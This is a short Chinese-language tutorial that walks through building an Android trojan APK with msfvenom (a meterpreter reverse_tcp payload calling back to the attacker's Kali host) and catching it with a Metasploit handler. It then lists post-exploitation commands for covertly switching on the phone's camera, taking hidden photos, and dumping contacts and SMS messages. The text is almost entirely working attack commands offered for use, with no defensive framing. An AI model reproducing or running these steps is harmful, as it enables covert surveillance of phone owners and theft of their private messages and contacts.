查看kali的ip,输入命令
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 > /root/apk.apk
然后启动msf:
msfconsole
1.use exploit/multi/handler //加载模块
2. set payload android/meterpreter/reverse_tcp //选择Payload
3.show options //查看参数设置
这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置
1.set LHOST 172.23.0.209 //这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
3.exploit //开始执行漏洞 开始监听,等待手机上线
image.png
红色框出的地方就说明手机上线了 然后可以输入sysinfo 查看手机信息
webcam_list 查看手机有多少个摄像头 这里显示是2个
image.png
webcam_stream //开启摄像头
webcam_snap //隐秘拍照功能
image.png
dump_contacts //导出电话号码
dump_sms //导出信息
可以输入?查看更多命令
参考来源:
http://mobile.hiapk.com/s595dc0128501.html
https://blog.csdn.net/qq_34841823/article/details/54575821
